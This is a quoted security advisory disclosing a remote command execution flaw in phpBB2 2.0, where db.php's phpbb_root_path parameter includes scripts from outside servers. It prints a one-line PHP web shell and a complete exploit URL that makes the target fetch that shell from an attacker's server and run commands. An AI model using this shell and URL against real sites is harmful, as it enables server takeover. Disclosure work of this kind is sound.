> PhpBB2 Remote Command Execution >------------------------------------------------------------------------ > > >SUMMARY > >The phpbb_root_path variable accepts scripts from external servers, which >makes phpBB2 vulnerable to remote execution command using a custom script >written by the attacker. > >DETAILS > >Vulnerable systems: >phpBB2 version 2.0. > > >The "phpBB2 root path" variable accepts input from other web sites, and >this enables remote attackers to execute arbitrary commands remotely. >The vulnerability lies in the fact that db.php accepts the following >input: >'/phpBB2/includes/db.php?phpbb_root_path=full_path_to_script' >Where the full_path_to_script can be a full URL from another web server. > >For example, create a directory called 'db' on your web server. Now at >this db directory create a file called 'mysql.txt' or 'mysql4.txt' or >'postgres.txt' (other file name don't seem to work). > >This mysql.txt should contain this line: > > <? echo "<pre>"; system($cmd); ?> > >The next step is to type in the following URL in your browser: > >http://example.com/phpBB2/includes/db.php?phpbb_root_path=http://your_http_ server/&dbms=mysql&phpEx=txt&cmd=uname%20-a > >You should get the 'uname result' of example.com > > >ADDITIONAL INFORMATION > >This vulnerability was found by pokley and ><mailto:[EMAIL PROTECTED]> nullbyte.
